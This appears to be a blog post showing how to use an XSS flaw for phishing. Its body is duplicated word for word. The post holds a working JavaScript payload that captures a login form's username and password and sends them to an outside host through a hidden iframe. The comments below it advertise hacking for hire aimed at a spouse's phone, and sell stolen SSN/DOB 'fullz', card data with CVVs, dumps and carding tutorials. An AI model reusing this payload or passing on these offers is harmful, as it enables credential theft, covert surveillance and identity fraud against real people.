XSS are certainly changing the away that Phishing attacks are perpetrated.
This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.
for example we have a target as :-
http://Thewebsite.com/google/add.php?request=
Suppose, there is a login form and a XSS vulnerability in the
same page.
In order to perpetrate the phishing attack one need to inject JavaScript code in the
variable to make that the victim’s browser load a JavaScript file.
From a brief analyses at the HTML that the site generates I know that :
• The value that the variable “request” receives is not sanitized at all.
• The login form is named “login_clientes”
• The login form have two input fields for user data: “user” and “pass”.
So I will use the following JavaScript code:
loginForm = document.forms['login_clientes'];
function parseData()
{
var username = loginForm.user.value;
var password = loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" +
password;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.onsubmit = parseData;
So, if browsing a page like (don’t forget to encode the part of the injection):
http://Thewebsite.com/google/add.php?request=
A victim will give you his personal data, as long as he clicks the Submit button.
The ideas that you must have in mind are:
• If you can make the user browser load your JavaScript file or code when visiting
some site, you can change that site behavior.
• If some site has forms and XSS vulnerabilities you can try to get the user
inputted data.
• If the user trust the site, the user will, probably, give his personal data
anywhere in that site.
And if the site has vulnerabilities in some page where it doesn’t have forms, and have
some form(s) in other page(s).
This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.
for example we have a target as :-
http://Thewebsite.com/google/add.php?request=
Suppose, there is a login form and a XSS vulnerability in the
same page.
In order to perpetrate the phishing attack one need to inject JavaScript code in the
variable to make that the victim’s browser load a JavaScript file.
From a brief analyses at the HTML that the site generates I know that :
• The value that the variable “request” receives is not sanitized at all.
• The login form is named “login_clientes”
• The login form have two input fields for user data: “user” and “pass”.
So I will use the following JavaScript code:
loginForm = document.forms['login_clientes'];
function parseData()
{
var username = loginForm.user.value;
var password = loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" +
password;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.onsubmit = parseData;
So, if browsing a page like (don’t forget to encode the part of the injection):
http://Thewebsite.com/google/add.php?request=
A victim will give you his personal data, as long as he clicks the Submit button.
The ideas that you must have in mind are:
• If you can make the user browser load your JavaScript file or code when visiting
some site, you can change that site behavior.
• If some site has forms and XSS vulnerabilities you can try to get the user
inputted data.
• If the user trust the site, the user will, probably, give his personal data
anywhere in that site.
And if the site has vulnerabilities in some page where it doesn’t have forms, and have
some form(s) in other page(s).
I was very impressed by this post, this site has always been pleasant news. Thank you very much for such an interesting post. Keep working, great job! In my free time, I like play game: imgtaram. What about you?
ReplyDeletei was lost with no hope for my wife was cheating and had always got away with it because i did not know how or
ReplyDeletealways too scared to pin anything on her. with the help a friend who recommended me to who help hack her phone,
email, chat, sms and expose her for a cheater she is. I just want to say a big thank you to
SUPERIOR.HACK@GMAIL.COM . am sure someone out there is looking for how to solve his relationship problems, you can also contact him for all sorts of hacking job..he is fast and reliable. you could also text +1 213-295-1376(whatsapp) contact and thank me later
Hi Guy's
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk.
>>1$ each SSN+DOB
>>2$ each with SSN+DOB+DL
>>5$ each for premium (also included relative info)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SMTP Linux Root
DUMPS with pins track 1 and 2
Socks, rdp's, vpn's
Server I.P's
HQ Emails with passwords
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
GOO=D DAY TO ALL
ReplyDeleteHello Everyone
We are providing all types of
*FULLZ
*TOOLS
*TUTORIALS
*FULL PACKAGES
For More Details Contact
I:C:Q : 752822040
Tele.Gram : @killhacks
Wickr/Skype : peeterhacks
HACK_ING TOOLS WITH TUTS
SPA_MMING TOOLS, TUTS, Ebooks, Methods
CA_RDING CAS_HOUT METHODS & GUIDES
KALI_LINUX FULL
SMTP's/RDP's/SHELLS/BRUTES
SENDERS/MAILERS/SMS BOMBER
D**P/D**K W_EB COMPLETE GUIDE WITH UPDATED WORKING ONION LINKS
FR**D BI**E 2021-2022
COMBOS/LOGS/PREMIUM LOGS
Each & Everything you can asked, we'll provide
Legit stuff with customer satisfaction
Feel Free to contact
I_C_Q : 7528_22040
TE_LE_GRAM : @leadsupplier
SSN DOB FULLZ
SSN DOB DL FULLZ
CC FULLZ WITH CVV
DUMPS WITH PIN CODES (101/202)
HIGH CREDIT SCORES FULLZ